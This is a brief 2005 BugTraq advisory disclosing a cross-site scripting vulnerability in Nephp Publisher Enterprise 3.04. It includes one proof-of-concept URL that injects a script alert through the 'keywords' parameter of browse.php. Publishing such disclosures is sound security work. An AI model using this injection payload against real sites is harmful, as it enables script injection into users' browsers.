BugTraq
Nephp Publisher Enterprise 3.04 Cross Site Scripting Aug 22 2005 06:04AM
bl2k shabgard org
Program Name : Nephp Publisher Enterprise
Release Version : 3.04
Home : http://www.nephp.com
Type : Validation
Description : Vulnerable to Cross Site Scripting (XSS) attacks.
------------------------------------------------------------------------
-
example :

/nephp/browse.php?mod=find&keywords='%3E%3Cscript%3Ealert('test');%3C/sc
ript%3E

bl2k
Greetz : strcpy,Hergy,magic,mouse,Littlehacker ...
www.shabgard.org

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus